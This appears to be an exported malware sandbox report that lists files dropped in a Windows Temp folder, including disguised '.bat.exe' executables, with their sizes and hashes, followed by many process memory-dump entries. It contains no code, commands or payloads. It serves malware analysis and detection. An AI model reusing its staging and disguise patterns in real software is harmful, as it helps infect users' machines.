SHA256
7df49cba50cc184b0fbb31349bd9f2b18acf5f7e7fac9670759efa48564eaef1

SHA512
4ce668cf2391422ef37963a5fd6c6251d414f63545efb3f1facb77e4695cd5a8af347bd77fc2bebfa7fd3ef10ff413a7acfde32957037a51c59806577351825f

Download Submit
C:\Users\Admin\AppData\Local\Temp\SRD.bat
Filesize
394KB

MD5
809325b0bf02d5f44ce3d005b018cc12

SHA1
c39206a6b0e5dfaf5d4a50c5887b8400d55eda87

SHA256
136c478f4bd8baf478b13a43d31d62d69669c40453ca3fe81ddfebe2ff6ab0c4

SHA512
a8b1ee15056f625ebe89a9968b2820c7bad7fc76197f705d785ecee78fbe93355cae2d784cadfdf68fc23533ab2bc8e3bd67de9e1bba07b1c4f5d6c3529a7473

Download Submit
C:\Users\Admin\AppData\Local\Temp\SRD.bat.exe
Filesize
423KB

MD5
c32ca4acfcc635ec1ea6ed8a34df5fac

SHA1
f5ee89bb1e4a0b1c3c7f1e8d05d0677f2b2b5919

SHA256
73a3c4aef5de385875339fc2eb7e58a9e8a47b6161bdc6436bf78a763537be70

SHA512
6e43dca1b92faace0c910cbf9308cf082a38dd39da32375fad72d6517dea93e944b5e5464cf3c69a61eabf47b2a3e5aa014d6f24efa1a379d4c81c32fa39ddbc

Download Submit
C:\Users\Admin\AppData\Local\Temp\SRD.bat.exe
Filesize
423KB

MD5
c32ca4acfcc635ec1ea6ed8a34df5fac

SHA1
f5ee89bb1e4a0b1c3c7f1e8d05d0677f2b2b5919

SHA256
73a3c4aef5de385875339fc2eb7e58a9e8a47b6161bdc6436bf78a763537be70

SHA512
6e43dca1b92faace0c910cbf9308cf082a38dd39da32375fad72d6517dea93e944b5e5464cf3c69a61eabf47b2a3e5aa014d6f24efa1a379d4c81c32fa39ddbc

Download Submit
C:\Users\Admin\AppData\Local\Temp\SRD.bat.exe
Filesize
423KB

MD5
c32ca4acfcc635ec1ea6ed8a34df5fac

SHA1
f5ee89bb1e4a0b1c3c7f1e8d05d0677f2b2b5919

SHA256
73a3c4aef5de385875339fc2eb7e58a9e8a47b6161bdc6436bf78a763537be70

SHA512
6e43dca1b92faace0c910cbf9308cf082a38dd39da32375fad72d6517dea93e944b5e5464cf3c69a61eabf47b2a3e5aa014d6f24efa1a379d4c81c32fa39ddbc

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_hdfjcnn0.tct.ps1
Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\ldx999sx.exe
Filesize
220KB

MD5
a780dd7a5ed788b79d157339f69bbad4

SHA1
7e10cd37e03420947d45c0374b05f23e058731e9

SHA256
78ad9e5dbc080327aa2b725b3278a9c53c85099ba86807b7943f11da1127c778

SHA512
e8da669acd35969e767fe475b387495122dfc6f208636a648a9213a1e7b7891d6e64ba2260d0a018f0e4f4d94f67ce126b8006795062837dff88f93a56b469dd

Download Submit
C:\Users\Admin\AppData\Local\Temp\ldx999sx.exe
Filesize
220KB

MD5
a780dd7a5ed788b79d157339f69bbad4

SHA1
7e10cd37e03420947d45c0374b05f23e058731e9

SHA256
78ad9e5dbc080327aa2b725b3278a9c53c85099ba86807b7943f11da1127c778

SHA512
e8da669acd35969e767fe475b387495122dfc6f208636a648a9213a1e7b7891d6e64ba2260d0a018f0e4f4d94f67ce126b8006795062837dff88f93a56b469dd

Download Submit
C:\Users\Admin\AppData\Local\Temp\ldx999sx.exe
Filesize
220KB

MD5
a780dd7a5ed788b79d157339f69bbad4

SHA1
7e10cd37e03420947d45c0374b05f23e058731e9

SHA256
78ad9e5dbc080327aa2b725b3278a9c53c85099ba86807b7943f11da1127c778

SHA512
e8da669acd35969e767fe475b387495122dfc6f208636a648a9213a1e7b7891d6e64ba2260d0a018f0e4f4d94f67ce126b8006795062837dff88f93a56b469dd

Download Submit
C:\Users\Admin\AppData\Local\Temp\ldx999sx.exe
Filesize
220KB

MD5
a780dd7a5ed788b79d157339f69bbad4

SHA1
7e10cd37e03420947d45c0374b05f23e058731e9

SHA256
78ad9e5dbc080327aa2b725b3278a9c53c85099ba86807b7943f11da1127c778

SHA512
e8da669acd35969e767fe475b387495122dfc6f208636a648a9213a1e7b7891d6e64ba2260d0a018f0e4f4d94f67ce126b8006795062837dff88f93a56b469dd

Download Submit
C:\Users\Admin\AppData\Local\Temp\s777mx.exe
Filesize
220KB

MD5
8d7ebe871589d79f195f240dcef43a57

SHA1
f5315edc9bfeb6f37c9df6ad1f10cb3363412d96

SHA256
19397c6dce459330095edc72759d1e79e26f1e12f013cdaee6dbdb90d65aaae8

SHA512
244be66bb480d320ef6d5cbfcd21e526a53726397c1fc4b512935bc50039b0bb773e3f12fd53910d3da9e69ebb8e3fd1a56d22d2fcb2e090c93c9759cdc497cd

Download Submit
C:\Users\Admin\AppData\Local\Temp\s777mx.exe
Filesize
220KB

MD5
8d7ebe871589d79f195f240dcef43a57

SHA1
f5315edc9bfeb6f37c9df6ad1f10cb3363412d96

SHA256
19397c6dce459330095edc72759d1e79e26f1e12f013cdaee6dbdb90d65aaae8

SHA512
244be66bb480d320ef6d5cbfcd21e526a53726397c1fc4b512935bc50039b0bb773e3f12fd53910d3da9e69ebb8e3fd1a56d22d2fcb2e090c93c9759cdc497cd

Download Submit
C:\Users\Admin\AppData\Local\Temp\s777mx.exe
Filesize
220KB

MD5
8d7ebe871589d79f195f240dcef43a57

SHA1
f5315edc9bfeb6f37c9df6ad1f10cb3363412d96

SHA256
19397c6dce459330095edc72759d1e79e26f1e12f013cdaee6dbdb90d65aaae8

SHA512
244be66bb480d320ef6d5cbfcd21e526a53726397c1fc4b512935bc50039b0bb773e3f12fd53910d3da9e69ebb8e3fd1a56d22d2fcb2e090c93c9759cdc497cd

Download Submit
C:\Users\Admin\AppData\Local\Temp\sv.bat
Filesize
78KB

MD5
ca039530887fa8dce08b07808582c4c7

SHA1
15b27c115ecf430bb3adccba408e6cdd6b94945c

SHA256
567b3fbd05b70248c6961e4cf5fc0196ae3f84d190402ca0d72e849007baf393

SHA512
9e7c3f51791c4c6aaa745622ae698cec04a75cbc716b267b4f258d599f56befab3d7142e2ce6dcac4d46d444fe2225c987ba1662788e47c39eb8538b7ab050d8

Download Submit
C:\Users\Admin\AppData\Local\Temp\sv.bat.exe
Filesize
423KB

MD5
c32ca4acfcc635ec1ea6ed8a34df5fac

SHA1
f5ee89bb1e4a0b1c3c7f1e8d05d0677f2b2b5919

SHA256
73a3c4aef5de385875339fc2eb7e58a9e8a47b6161bdc6436bf78a763537be70

SHA512
6e43dca1b92faace0c910cbf9308cf082a38dd39da32375fad72d6517dea93e944b5e5464cf3c69a61eabf47b2a3e5aa014d6f24efa1a379d4c81c32fa39ddbc

Download Submit
C:\Users\Admin\AppData\Local\Temp\sv.bat.exe
Filesize
423KB

MD5
c32ca4acfcc635ec1ea6ed8a34df5fac

SHA1
f5ee89bb1e4a0b1c3c7f1e8d05d0677f2b2b5919

SHA256
73a3c4aef5de385875339fc2eb7e58a9e8a47b6161bdc6436bf78a763537be70

SHA512
6e43dca1b92faace0c910cbf9308cf082a38dd39da32375fad72d6517dea93e944b5e5464cf3c69a61eabf47b2a3e5aa014d6f24efa1a379d4c81c32fa39ddbc

Download Submit
memory/544-954-0x00000000001A0000-0x00000000001AF000-memory.dmp

Filesize
60KB

Download
memory/544-930-0x0000000001300000-0x000000000130B000-memory.dmp

Filesize
44KB

Download
memory/1424-396-0x0000000000FF0000-0x000000000164E000-memory.dmp

Filesize
6.4MB

Download
memory/1424-424-0x0000000006070000-0x0000000006080000-memory.dmp

Filesize
64KB

Download
memory/1424-439-0x00000000707B0000-0x0000000070D90000-memory.dmp

Filesize
5.9MB

Download
memory/1644-445-0x0000000000630000-0x000000000063C000-memory.dmp

Filesize
48KB

Download
memory/1856-206-0x0000000003630000-0x0000000003639000-memory.dmp

Filesize
36KB

Download
memory/2176-170-0x00000000046E0000-0x00000000046F0000-memory.dmp

Filesize
64KB

Download
memory/2176-139-0x0000000004D60000-0x0000000005388000-memory.dmp

Filesize
6.2MB

Download
memory/2176-158-0x0000000007660000-0x0000000007CDA000-memory.dmp

Filesize
6.5MB

Download
memory/2176-155-0x00000000061F0000-0x0000000006234000-memory.dmp

Filesize
272KB

Download
memory/2176-162-0x00000000046E0000-0x00000000046F0000-memory.dmp

Filesize
64KB

Download
memory/2176-154-0x0000000005C70000-0x0000000005C8E000-memory.dmp

Filesize
120KB

Download
memory/2176-153-0x00000000046E0000-0x00000000046F0000-memory.dmp

Filesize
64KB

Download
memory/2176-152-0x00000000046E0000-0x00000000046F0000-memory.dmp

Filesize
64KB

Download
memory/2176-169-0x00000000046E0000-0x00000000046F0000-memory.dmp

Filesize
64KB

Download
memory/2176-141-0x0000000005390000-0x00000000053F6000-memory.dmp

Filesize
408KB

Download
memory/2176-144-0x0000000005630000-0x0000000005696000-memory.dmp

Filesize
408KB

Download
memory/2176-138-0x00000000046F0000-0x0000000004726000-memory.dmp

Filesize
216KB

Download
memory/2176-156-0x0000000006F60000-0x0000000006FD6000-memory.dmp

Filesize
472KB

Download
memory/2176-157-0x00000000046E0000-0x00000000046F0000-memory.dmp

Filesize
64KB

Download
memory/2176-159-0x0000000007000000-0x000000000701A000-memory.dmp

Filesize
104KB

Download
memory/2176-171-0x00000000046E0000-0x00000000046F0000-memory.dmp

Filesize
64KB

Download
memory/2176-173-0x00000000046E0000-0x00000000046F0000-memory.dmp

Filesize
64KB

Download
memory/2176-140-0x0000000004CC0000-0x0000000004CE2000-memory.dmp

Filesize
136KB

Download
memory/2176-160-0x0000000007D50000-0x0000000007D72000-memory.dmp

Filesize
136KB

Download
memory/2228-134-0x0000000005AA0000-0x0000000006044000-memory.dmp

Filesize
5.6MB

Download
memory/2228-168-0x0000000005520000-0x0000000005530000-memory.dmp

Filesize
64KB

Download
memory/2228-133-0x0000000000CC0000-0x0000000000D0C000-memory.dmp

Filesize
304KB

Download
memory/2228-137-0x0000000005520000-0x0000000005530000-memory.dmp

Filesize
64KB

Download
memory/2228-136-0x0000000005640000-0x000000000564A000-memory.dmp

Filesize
40KB

Download
memory/2228-135-0x0000000005590000-0x0000000005622000-memory.dmp

Filesize
584KB

Download
memory/2500-1656-0x0000000000430000-0x000000000043C000-memory.dmp

Filesize
48KB

Download
memory/2500-1658-0x0000000000B40000-0x0000000000B49000-memory.dmp

Filesize
36KB

Download
memory/2992-254-0x000002BC6AF80000-0x000002BC6B0B6000-memory.dmp

Filesize
1.2MB

Download
memory/2992-247-0x000002BC6AF80000-0x000002BC6B0B6000-memory.dmp

Filesize
1.2MB

Download
memory/2992-266-0x000002BC6AF80000-0x000002BC6B0B6000-memory.dmp

Filesize
1.2MB

Download
memory/2992-268-0x000002BC6AF80000-0x000002BC6B0B6000-memory.dmp

Filesize
1.2MB

Download
memory/2992-270-0x000002BC6AF80000-0x000002BC6B0B6000-memory.dmp

Filesize
1.2MB

Download
memory/2992-272-0x000002BC6AF80000-0x000002BC6B0B6000-memory.dmp

Filesize
1.2MB

Download
memory/2992-275-0x000002BC6AF80000-0x000002BC6B0B6000-memory.dmp

Filesize
1.2MB

Download
memory/2992-277-0x000002BC6AF80000-0x000002BC6B0B6000-memory.dmp

Filesize
1.2MB

Download
memory/2992-279-0x000002BC6AF80000-0x000002BC6B0B6000-memory.dmp

Filesize
1.2MB

Download
memory/2992-284-0x000002BC6AF80000-0x000002BC6B0B6000-memory.dmp

Filesize
1.2MB

Download
memory/2992-281-0x000002BC6AF80000-0x000002BC6B0B6000-memory.dmp

Filesize
1.2MB

Download
memory/2992-286-0x000002BC6AF80000-0x000002BC6B0B6000-memory.dmp

Filesize
1.2MB

Download
memory/2992-288-0x000002BC6AF80000-0x000002BC6B0B6000-memory.dmp

Filesize
1.2MB

Download
memory/2992-290-0x000002BC6AF80000-0x000002BC6B0B6000-memory.dmp

Filesize
1.2MB

Download
memory/2992-294-0x000002BC6AF80000-0x000002BC6B0B6000-memory.dmp

Filesize
1.2MB

Download
memory/2992-292-0x000002BC6AF80000-0x000002BC6B0B6000-memory.dmp

Filesize
1.2MB

Download
memory/2992-296-0x000002BC6AF80000-0x000002BC6B0B6000-memory.dmp

Filesize
1.2MB

Download
memory/2992-261-0x000002BC6AF80000-0x000002BC6B0B6000-memory.dmp

Filesize
1.2MB

Download
memory/2992-259-0x000002BC6AF80000-0x000002BC6B0B6000-memory.dmp

Filesize
1.2MB

Download
memory/2992-228-0x000002BC689A0000-0x000002BC68B0A000-memory.dmp

Filesize
1.4MB

Download
memory/2992-249-0x000002BC6AF80000-0x000002BC6B0B6000-memory.dmp

Filesize
1.2MB

Download
memory/2992-229-0x000002BC6A790000-0x000002BC6A7A0000-memory.dmp

Filesize
64KB

Download
memory/2992-1317-0x000002BC6A790000-0x000002BC6A7A0000-memory.dmp

Filesize
64KB

Download
memory/2992-245-0x000002BC6AF80000-0x000002BC6B0B6000-memory.dmp

Filesize
1.2MB

Download
memory/2992-234-0x000002BC6AF80000-0x000002BC6B0B6000-memory.dmp

Filesize
1.2MB

Download
memory/2992-243-0x000002BC6AF80000-0x000002BC6B0B6000-memory.dmp

Filesize
1.2MB

Download
memory/2992-241-0x000002BC6AF80000-0x000002BC6B0B6000-memory.dmp

Filesize
1.2MB

Download
memory/2992-239-0x000002BC6AF80000-0x000002BC6B0B6000-memory.dmp

Filesize
1.2MB

Download
memory/2992-237-0x000002BC6AF80000-0x000002BC6B0B6000-memory.dmp

Filesize
1.2MB

Download
memory/2992-235-0x000002BC6AF80000-0x000002BC6B0B6000-memory.dmp

Filesize
1.2MB

Download
memory/2992-263-0x000002BC6AF80000-0x000002BC6B0B6000-memory.dmp

Filesize
1.2MB

Download
memory/3280-253-0x0000000001C40000-0x0000000001C4F000-memory.dmp

Filesize
60KB

Download
memory/3292-211-0x0000000002AB0000-0x0000000002AC6000-memory.dmp

Filesize
88KB

Download
memory/3420-208-0x0000000001BB0000-0x0000000001BB5000-memory.dmp

Filesize
20KB

Download
memory/3420-216-0x0000000000400000-0x0000000001B38000-memory.dmp

Filesize
23.2MB

Download
memory/3428-209-0x0000000000400000-0x0000000000409000-memory.dmp

Filesize
36KB

Download
memory/3428-204-0x0000000000400000-0x0000000000409000-memory.dmp

Filesize
36KB

Download
memory/3428-212-0x0000000000400000-0x0000000000409000-memory.dmp

Filesize
36KB

Download
memory/4248-725-0x0000000001300000-0x000000000136B000-memory.dmp

Filesize
428KB

Download
memory/4248-432-0x0000000001300000-0x000000000136B000-memory.dmp

Filesize
428KB

Download
memory/4248-426-0x0000000001370000-0x00000000013F0000-memory.dmp

Filesize
512KB

Download
memory/4256-758-0x0000000001300000-0x0000000001309000-memory.dmp

Filesize
36KB

Download
memory/4256-703-0x0000000000630000-0x000000000063C000-memory.dmp

Filesize
48KB

Download
memory/4340-1835-0x00000000001B0000-0x00000000001B9000-memory.dmp

Filesize
36KB

Download
memory/4340-1822-0x0000000000B40000-0x0000000000B49000-memory.dmp

Filesize
36KB

Download
memory/4380-1893-0x00000000001B0000-0x00000000001B9000-memory.dmp

Filesize
36KB

Download
memory/4380-1922-0x0000000000370000-0x0000000000397000-memory.dmp

Filesize
156KB

Download
memory/4500-918-0x0000000001300000-0x000000000130B000-memory.dmp

Filesize
44KB

Download
memory/4500-915-0x0000000001300000-0x0000000001309000-memory.dmp

Filesize
36KB

Download
memory/4696-1500-0x0000000001300000-0x0000000001309000-memory.dmp

Filesize
36KB

Download
memory/4696-1502-0x0000000000430000-0x000000000043C000-memory.dmp

Filesize
48KB

Download
memory/4716-174-0x0000000018440000-0x0000000018450000-memory.dmp

Filesize
64KB

Download
memory/4716-177-0x0000000019BB0000-0x0000000019C00000-memory.dmp

Filesize
320KB

Download
memory/4716-176-0x000000001B8C0000-0x000000001BDEC000-memory.dmp

Filesize
5.2MB

Download
memory/4716-175-0x000000001B1C0000-0x000000001B382000-memory.dmp

Filesize
1.8MB

Download
memory/4716-167-0x0000000018440000-0x0000000018450000-memory.dmp

Filesize
64KB

Download
memory/4716-166-0x0000000018400000-0x000000001843C000-memory.dmp

Filesize
240KB

Download
memory/4716-165-0x00000000183A0000-0x00000000183B2000-memory.dmp

Filesize
72KB

Download
memory/4716-164-0x0000000018660000-0x000000001876A000-memory.dmp

Filesize
1.0MB

Download
memory/4716-163-0x0000000018B70000-0x0000000019188000-memory.dmp

Filesize
6.1MB

Download
memory/4716-161-0x0000000000400000-0x0000000000430000-memory.dmp

Filesize
192KB

Download
memory/4776-1340-0x0000000001300000-0x0000000001309000-memory.dmp

Filesize
36KB

Download
memory/4940-739-0x0000000000AF0000-0x0000000000AFB000-memory.dmp

Filesize
44KB

Download